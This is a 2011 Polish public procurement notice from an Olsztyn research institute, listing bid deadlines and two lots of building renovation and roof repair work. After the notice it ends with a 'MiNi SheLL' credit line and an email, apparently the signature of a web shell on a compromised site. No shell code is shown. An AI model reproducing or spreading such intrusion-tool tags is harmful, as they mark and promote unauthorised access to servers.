<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pan.olsztyn.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2011 godzina 12:00, miejsce: Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk ul. Bydgoska 1/8; 10-243 Olsztyn pokój B25..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlano instalacyjne wraz z dostawą i montażem mebli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiar uwzględnia roboty budowlane, elektryczne, sanitarne oraz informatyczne takie jak: roboty rozbiórkowe, położenie tynków na ścianach, szpachlowanie ścian, remont posadzki cementowej, malowanie ścian i sufitów, ułożenie posadzki, wykucie ościeżnicy i wstawienie okna, demontaż urządzeń sanitarnych wraz z korkowaniem  podejść dopływowych i odpływowych, zamocowanie umywalki, rozebranie ścianek pełnych, wstawienie okna i drzwi balkonowych, uzbrojenie istniejących drzwi wejściowych w zamek kodowany cyfrowo, remont instalacji elektrycznej i informatycznej, wywiezienie gruzu. Dostawa i montaż mebli obejmuje: biurka komputerowe szt.9, regały na segregatory szt. 5, szafki wiszące nad biurkiem szt. 6, szafka z blatem pod ksero szt. 1, aneks kuchenny szt. 1 oraz obudowa rur c.o. - szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.31.43.20-0, 39.10.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont dachu wraz z kominami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiar uwzględnia roboty budowlane tj. remont kominów i połaci dachowej, wraz z instalacją odgromową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.26.26.00-7, 45.45.30.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com